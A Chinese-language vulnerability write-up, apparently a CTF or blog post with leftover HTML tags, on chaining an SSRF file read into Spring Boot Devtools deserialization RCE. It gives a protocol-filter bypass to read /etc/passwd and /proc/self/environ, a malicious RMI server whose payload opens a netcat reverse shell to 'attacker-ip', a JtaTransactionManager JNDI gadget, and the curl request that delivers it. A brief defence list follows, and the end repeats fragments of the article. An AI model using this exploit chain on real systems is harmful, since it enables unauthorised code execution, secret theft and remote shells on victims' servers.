Spring Devtools 反序列化漏洞分析与利用<\/h1>

0x01 漏洞背景<\/h2>
Spring Boot Devtools 是 Spring Boot 提供的开发者工具模块，主要用于提高开发效率，支持热部署等功能。在特定配置下，Devtools 的远程调试功能存在反序列化漏洞，可能导致远程代码执行。<\/p>

0x02 漏洞环境分析<\/h2>

环境特征<\/h3>

Spring Boot 应用启用了 Devtools 模块<\/li>
配置文件中设置了 spring.devtools.remote.secret<\/code> 属性<\/li>
JDK 版本为 8u265（高版本）<\/li>

依赖中包含 spring-boot-devtools<\/code> 和 spring-tx<\/code><\/li>
<\/ul>
关键依赖<\/h3>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.springframework.boot<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>spring-boot-devtools<\/artifactId><\/span>
<\/span><\/span>    <optional><\/span>true<\/optional><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>0x03 前置漏洞：SSRF 到任意文件读取<\/h2>
漏洞代码分析<\/h3>
控制器中存在一个 SSRF 端点：<\/p>
@RequestMapping<\/span>(<\/span>value =<\/span> "\/pathneverguess"<\/span>,<\/span> method =<\/span> RequestMethod.<\/span>GET<\/span>)<\/span>
<\/span><\/span>@ResponseBody<\/span>
<\/span><\/span>public<\/span> String ping<\/span>(<\/span>@RequestParam<\/span> String url)<\/span> {<\/span>
<\/span><\/span>    return<\/span> PingUtil.<\/span>ping<\/span>(<\/span>url);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>PingUtil 类中的关键方法：<\/p>
public<\/span> static<\/span> String ping<\/span>(<\/span>String urlString)<\/span> {<\/span>
<\/span><\/span>    String ret =<\/span> ""<\/span>;<\/span>
<\/span><\/span>    OutputStream os =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>    if<\/span> (<\/span>validate(<\/span>cleanUrl(<\/span>urlString)))<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            URL url =<\/span> new<\/span> URL(<\/span>urlString);<\/span>
<\/span><\/span>            URLConnection urlConnection =<\/span> url.<\/span>openConnection<\/span>();<\/span>
<\/span><\/span>            \/\/ ... 读取URL内容并返回 ...
<\/span><\/span><\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>协议过滤绕过<\/h3>
validate 方法使用正则表达式过滤危险协议：<\/p>
String blacklist =<\/span> "^[file|netdoc|jar|ftp|mailto]"<\/span>;<\/span>
<\/span><\/span>Pattern pattern =<\/span> Pattern.<\/span>compile<\/span>(<\/span>blacklist,<\/span> Pattern.<\/span>CASE_INSENSITIVE<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>绕过技巧<\/strong>：

利用 URL 类的处理特性，在协议前添加 url:<\/code> 前缀可以绕过过滤：<\/p>
url:file:\/\/\/etc\/passwd
<\/code><\/pre>
信息收集<\/h3>
通过文件读取获取关键信息：<\/p>

\/proc\/self\/environ<\/code> 泄露环境变量（包括 SECRET）<\/li>
发现 spring.devtools.remote.secret=${SECRET}<\/code> 配置<\/li>
<\/ul>
0x04 Devtools 反序列化漏洞<\/h2>
漏洞原理<\/h3>
Devtools 的远程调试功能提供了 HTTP 接口处理序列化数据：<\/p>
public<\/span> void<\/span> handle<\/span>(<\/span>ServerHttpRequest request,<\/span> ServerHttpResponse response)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>request.<\/span>getBody<\/span>());<\/span>
<\/span><\/span>        ClassLoaderFiles files =<\/span> (<\/span>ClassLoaderFiles)<\/span> objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>认证机制<\/h3>
请求需要包含正确的 X-AUTH-TOKEN<\/code> 头，对应 spring.devtools.remote.secret<\/code> 的值。默认值为 "mysecret"，开发者常忘记修改。<\/p>
0x05 高版本 JDK 下的利用<\/h2>
环境限制<\/h3>

JDK 8u265（高版本）<\/li>
常规反序列化链不可用<\/li>
JNDI 注入受到限制<\/li>
<\/ul>
可用利用链<\/h3>
利用 spring-tx<\/code> 中的 JtaTransactionManager<\/code> 触发 JNDI 查找：<\/p>
org.<\/span>springframework<\/span>.<\/span>transaction<\/span>.<\/span>jta<\/span>.<\/span>JtaTransactionManager<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/h3>

搭建恶意 RMI 服务器<\/li>
构造恶意序列化对象<\/li>
通过 Devtools 接口发送恶意请求<\/li>
<\/ol>
0x06 完整利用过程<\/h2>
1. 搭建恶意 RMI 服务<\/h3>
public<\/span> class<\/span> rmi<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        System.<\/span>setProperty<\/span>(<\/span>"java.rmi.server.hostname"<\/span>,<\/span> "attacker-ip"<\/span>);<\/span>
<\/span><\/span>        Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span> "org.apache.naming.factory.BeanFactory"<\/span>,<\/span> null<\/span>);<\/span>
<\/span><\/span>        ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "KINGX=eval"<\/span>));<\/span>
<\/span><\/span>        ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"KINGX"<\/span>,<\/span> 
<\/span><\/span>            "\"\".getClass().forName(\"javax.script.ScriptEngineManager\")"<\/span> +<\/span>
<\/span><\/span>            ".newInstance().getEngineByName(\"JavaScript\")"<\/span> +<\/span>
<\/span><\/span>            ".eval(\"new java.lang.ProcessBuilder['(java.lang.String[])']"<\/span> +<\/span>
<\/span><\/span>            "(['\/bin\/bash','-c','rm -f \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc attacker-ip 4444 >\/tmp\/f']).start()\")"<\/span>));<\/span>
<\/span><\/span>            
<\/span><\/span>        ReferenceWrapper referenceWrapper =<\/span> new<\/span> com.<\/span>sun<\/span>.<\/span>jndi<\/span>.<\/span>rmi<\/span>.<\/span>registry<\/span>.<\/span>ReferenceWrapper<\/span>(<\/span>ref);<\/span>
<\/span><\/span>        registry.<\/span>bind<\/span>(<\/span>"Object"<\/span>,<\/span> referenceWrapper);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 生成恶意序列化对象<\/h3>
public<\/span> class<\/span> poc<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        String jndiAddress =<\/span> "rmi:\/\/attacker-ip:1099\/Object"<\/span>;<\/span>
<\/span><\/span>        org.<\/span>springframework<\/span>.<\/span>transaction<\/span>.<\/span>jta<\/span>.<\/span>JtaTransactionManager<\/span> object =<\/span> 
<\/span><\/span>            new<\/span> org.<\/span>springframework<\/span>.<\/span>transaction<\/span>.<\/span>jta<\/span>.<\/span>JtaTransactionManager<\/span>();<\/span>
<\/span><\/span>        object.<\/span>setUserTransactionName<\/span>(<\/span>jndiAddress);<\/span>
<\/span><\/span>        
<\/span><\/span>        ObjectOutputStream objectOutputStream =<\/span> 
<\/span><\/span>            new<\/span> ObjectOutputStream(<\/span>new<\/span> FileOutputStream(<\/span>"expObject"<\/span>));<\/span>
<\/span><\/span>        objectOutputStream.<\/span>writeObject<\/span>(<\/span>object);<\/span>
<\/span><\/span>        objectOutputStream.<\/span>close<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 发送恶意请求<\/h3>
使用 curl 发送恶意请求：<\/p>
curl -X POST \
<\/span><\/span><\/span><\/span>  -H "X-AUTH-TOKEN: found-secret"<\/span> \
<\/span><\/span><\/span><\/span>  --data-binary @expObject \
<\/span><\/span><\/span><\/span>  http:\/\/target:8080\/.~~spring-boot!~\/restart
<\/span><\/span><\/code><\/pre>0x07 防御措施<\/h2>


禁用 Devtools 远程调试<\/strong>：<\/p>

生产环境移除 spring-boot-devtools<\/code> 依赖<\/li>
或设置 spring.devtools.remote.enabled=false<\/code><\/li>
<\/ul>
<\/li>

使用强密钥<\/strong>：<\/p>

设置复杂且唯一的 spring.devtools.remote.secret<\/code><\/li>
<\/ul>
<\/li>

升级 JDK<\/strong>：<\/p>

使用最新版本 JDK，修复已知反序列化漏洞<\/li>
<\/ul>
<\/li>

输入验证<\/strong>：<\/p>

对所有用户输入进行严格验证和过滤<\/li>
<\/ul>
<\/li>

网络隔离<\/strong>：<\/p>

限制 Devtools 端口的网络访问<\/li>
<\/ul>
<\/li>
<\/ol>
0x08 总结<\/h2>
Spring Boot Devtools 的反序列化漏洞结合高版本 JDK 的绕过技术，可以形成完整的攻击链。攻击者需要先获取 Devtools 的 secret（默认或通过其他漏洞获取），然后构造特定的序列化对象触发 JNDI 注入，最终实现 RCE。<\/p>
该漏洞的利用展示了从 SSRF 到文件读取，再到反序列化 RCE 的完整攻击路径，强调了纵深防御的重要性。<\/p>

Spring Devtools 反序列化漏洞分析与利用<\/h1>

0x01 漏洞背景<\/h2> Spring Boot Devtools 是 Spring Boot 提供的开发者工具模块，主要用于提高开发效率，支持热部署等功能。在特定配置下，Devtools 的远程调试功能存在反序列化漏洞，可能导致远程代码执行。<\/p>

0x02 漏洞环境分析<\/h2>

0x03 前置漏洞：SSRF 到任意文件读取<\/h2>

0x04 Devtools 反序列化漏洞<\/h2>

认证机制<\/h3> 请求需要包含正确的 X-AUTH-TOKEN<\/code> 头，对应 spring.devtools.remote.secret<\/code> 的值。默认值为 "mysecret"，开发者常忘记修改。<\/p>

0x06 完整利用过程<\/h2>

0x01 漏洞背景<\/h2>
Spring Boot Devtools 是 Spring Boot 提供的开发者工具模块，主要用于提高开发效率，支持热部署等功能。在特定配置下，Devtools 的远程调试功能存在反序列化漏洞，可能导致远程代码执行。<\/p>

认证机制<\/h3>
请求需要包含正确的 `X-AUTH-TOKEN<\/code> 头，对应 spring.devtools.remote.secret<\/code> 的值。默认值为 "mysecret"，开发者常忘记修改。<\/p>`